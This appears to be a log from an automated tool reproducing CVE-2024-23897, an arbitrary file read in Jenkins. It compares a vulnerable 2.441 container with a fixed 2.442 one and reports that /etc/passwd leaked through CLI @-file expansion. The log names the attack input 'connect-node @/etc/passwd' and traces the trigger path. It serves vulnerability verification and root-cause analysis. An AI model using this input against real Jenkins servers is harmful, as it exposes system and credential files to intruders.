[*] Project cache dir: /data/pruva/project-cache/1b32eb77-2993-4f6d-b197-c6547e683bde [*] CVE-2024-23897 reproduction - Jenkins CLI @-file expansion arbitrary file read [*] Vulnerable: jenkins/jenkins:2.441-jdk17 [*] Fixed: jenkins/jenkins:2.442-jdk17 [*] Container jenkins-vuln already running [+] Jenkins vuln ready { "entrypoint_kind": "api_remote", "entrypoint_detail": "jenkins-cli-over-http", "service_started": true, "healthcheck_passed": true, "target_path_reached": false, "runtime_stack": [ "docker", "jenkins-controller", "jenkins-cli-http" ], "proof_artifacts": [ "logs/vuln_attempt1.log", "logs/vuln_attempt2.log", "logs/fixed_attempt1.log", "logs/fixed_attempt2.log", "logs/cli_vuln.out", "logs/cli_fixed.out", "logs/docker_vuln.log", "logs/docker_fixed.log", "logs/cli_vuln_help.out", "logs/whoami_vuln.out", "logs/whoami_fixed.out", "logs/reproduction_steps.log", "logs/vuln_passwd_ground_truth.txt", "logs/fixed_passwd_ground_truth.txt" ], "notes": "vuln jenkins up, running exploit" } [*] vuln CLI jar cached [*] Ground-truth /etc/passwd lines in vuln container: 19 [*] Vuln file-leak: true (matched 19 / 19 ground-truth lines) [*] Container jenkins-fixed already running [+] Jenkins fixed ready [*] fixed CLI jar cached [*] Fixed file-leak: false ==================== RESULTS ==================== Vulnerable (2.441) file leak: true (19/19 lines confirmed) Fixed (2.442) file leak: false ================================================ [+] CONFIRMED: CVE-2024-23897 reproduced. { "entrypoint_kind": "api_remote", "entrypoint_detail": "jenkins-cli-over-http (connect-node @/etc/passwd)", "service_started": true, "healthcheck_passed": true, "target_path_reached": true, "runtime_stack": [ "docker", "jenkins-controller", "jenkins-cli-http" ], "proof_artifacts": [ "logs/vuln_attempt1.log", "logs/vuln_attempt2.log", "logs/fixed_attempt1.log", "logs/fixed_attempt2.log", "logs/cli_vuln.out", "logs/cli_fixed.out", "logs/docker_vuln.log", "logs/docker_fixed.log", "logs/cli_vuln_help.out", "logs/whoami_vuln.out", "logs/whoami_fixed.out", "logs/reproduction_steps.log", "logs/vuln_passwd_ground_truth.txt", "logs/fixed_passwd_ground_truth.txt" ], "notes": "CONFIRMED: vulnerable 2.441 leaked /etc/passwd via CLI @-file expansion over HTTP (19 lines matched ground truth); fixed 2.442 blocked it." } [+] RCA report written to /data/pruva/runs/b296fdc1-6e55-413e-baec-395e18ca3a2f/bundle/repro/rca_report.md { "claim_outcome": "partial", "claim_block_reason": "impact_mismatch", "repro_result": "confirmed", "validated_surface": "api_remote", "evidence_scope": "production_path", "claimed_impact_class": "code_execution", "observed_impact_class": "info_leak", "exploitability_confidence": "high", "attacker_controlled_input": "@/etc/passwd CLI argument over HTTP", "trigger_path": "jenkins-cli.jar -> HTTP /cli -> CLICommand.main -> args4j expandAtFiles -> file read -> error echo", "end_to_end_target_reached": true, "sanitizer_used": false, "crash_observed": false, "read_write_primitive_observed": false, "exploit_chain_demonstrated": false, "blocking_mitigation": null, "inferred": false }